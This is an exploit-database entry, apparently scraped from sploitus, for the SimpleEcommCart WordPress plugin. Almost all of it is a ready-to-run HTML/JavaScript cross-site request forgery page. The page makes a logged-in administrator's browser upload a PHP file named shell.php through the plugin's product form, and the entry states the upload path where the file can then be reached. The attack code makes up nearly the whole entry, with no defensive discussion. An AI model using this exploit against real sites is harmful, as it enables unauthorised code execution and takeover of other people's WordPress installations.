Share
## https://sploitus.com/exploit?id=WPEX-ID:1F2B3C4A-F7E9-4D22-B71E-F6B051FD8349
https://www.youtube.com/watch?v=KvXqTGvq4xQ
<html>
<body>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http:\/\/example.com\/wp-admin\/admin.php?page=simpleecommcart-products", true);
xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,*\/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-GB,en;q=0.5");
xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------14024174919792965573802180262");
xhr.withCredentials = true;
var body = "-----------------------------14024174919792965573802180262\r\n" +
"Content-Disposition: form-data; name=\"simpleecommcart-action\"\r\n" +
"\r\n" +
"save product\r\n" +
"-----------------------------14024174919792965573802180262\r\n" +
"Content-Disposition: form-data; name=\"product[name]\"\r\n" +
"\r\n" +
"test\r\n" +
"-----------------------------14024174919792965573802180262\r\n" +
"Content-Disposition: form-data; name=\"product[price]\"\r\n" +
"\r\n" +
"1\r\n" +
"-----------------------------14024174919792965573802180262\r\n" +
"Content-Disposition: form-data; name=\"product[upload]\"; filename=\"shell.php\"\r\n" +
"Content-Type: text/php\r\n" +
"\r\n" +
"\x3c?php echo \'FAILED\'; ?\x3e\n" +
"\r\n" +
"-----------------------------14024174919792965573802180262\r\n" +
"Content-Disposition: form-data; name=\"submit\"\r\n" +
"\r\n" +
"Save\r\n" +
"-----------------------------14024174919792965573802180262--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
<input type="button" value="Submit request" onclick="submitRequest();" />
</form>
</body>
</html>
File will be uploaded in: /wp-content/uploads/simpleecommcart/digitalproduct/shell.php